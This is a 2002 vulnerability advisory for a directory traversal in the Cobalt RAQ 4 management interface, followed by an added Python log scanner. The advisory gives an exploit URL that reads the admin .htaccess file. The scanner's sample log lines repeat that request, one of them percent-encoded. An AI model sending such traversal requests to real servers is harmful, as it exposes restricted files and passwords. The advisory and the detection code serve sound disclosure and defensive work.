CVE-2002-0347_Cobalt_RAQ_4_Server_Directory_Traversal_Vulnerability

# CVE-2002-0347 Cobalt RAQ 4 Server Directory Traversal Vulnerability
==INFO==

------oOo----------------
Cobalt RAQ 4 Server Management,
Cross Site Scripting, Directory Traversal & DoS Vulnerabilities.
------oOo----------------


Company Affected: www.cobalt.com & www.sun.com
Version: RAQ 4 Server Management.
Download: http://www.cobalt.com/products/raq/index.html
OS Affected: Linux ALL, Solaris ALL.


Author:

** Alex Hernandez 
** Thanks all the people from Spain and Argentina.
** Special Greets: White-B, Pablo S0r, Paco Spain, G.Maggiotti.


----=[Brief Description]=------------

Traversal File configuration.


Exploit:
http://10.0.0.1:81/.cobalt/sysManage/../admin/.htaccess

# Access file for /usr/admserv/html/.cobalt/admin/ (admin  )
order allow,deny
allow from all
require user admin
Authname CobaltRaQ
Authtype Basic


The default directory on the server is "/usr/admserv/html/.cobalt/admin";
you can traverse from it to any directory to capture restricted files or
passwords and to profile the users.
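
A log check for the request pattern described above, as an added example that is not part of the original advisory: it flags request targets whose ".." segments resolve outside the directory that was requested, and goes slightly beyond the advisory's single URL by also decoding percent-encoded dots. The log lines, the watch list of file names and the function names are constructed for illustration.

```python
import posixpath
import re
from urllib.parse import unquote, urlsplit

# Constructed sample lines in Common Log Format (not from a real server).
SAMPLE_LOG = """\
10.0.0.7 - - [01/Mar/2002:10:00:01 +0000] "GET /.cobalt/sysManage/index.html HTTP/1.0" 200 512
10.0.0.9 - - [01/Mar/2002:10:00:05 +0000] "GET /.cobalt/sysManage/../admin/.htaccess HTTP/1.0" 200 131
10.0.0.9 - - [01/Mar/2002:10:00:09 +0000] "GET /.cobalt/sysManage/%2e%2e/admin/.htaccess HTTP/1.0" 200 131
10.0.0.7 - - [01/Mar/2002:10:00:12 +0000] "GET /.cobalt/admin/ HTTP/1.0" 401 0
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|HEAD|POST) (\S+) [^"]*" (\d{3}) ')
SENSITIVE_NAMES = {".htaccess", ".htpasswd"}  # assumed watch list


def classify(raw_target):
    """Return the reasons a request target looks like a traversal attempt."""
    path = unquote(urlsplit(raw_target).path)  # decodes %2e%2e to ".."
    segments = path.split("/")
    resolved = posixpath.normpath(path)
    reasons = []
    if ".." in segments:
        # Directory the client asked for before the first ".." segment.
        requested_dir = "/".join(segments[:segments.index("..")])
        if not requested_dir or not resolved.startswith(requested_dir + "/"):
            reasons.append("dot-dot leaves %s -> %s" % (requested_dir or "/", resolved))
    if posixpath.basename(resolved) in SENSITIVE_NAMES:
        reasons.append("targets a server access-control file")
    return reasons


def scan(log_text):
    """Return (client, target, status, reasons) for each suspicious line."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.match(line)
        if not match:
            continue  # not a request line this parser understands
        client, target, status = match.groups()
        reasons = classify(target)
        if reasons:
            hits.append((client, target, int(status), reasons))
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A 200 status on a flagged line, as in the constructed sample, means the file was served and the authentication configured for the admin directory did not stop the request.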

Vendor Response:
The vendor was notified

Posted to Cobalt security lists:
cobalt-security@list.cobalt.com &
jlovell@sun.com

http://www.cobalt.com

Alex Hernandez  (c) 2002.

------oOo------------------------------------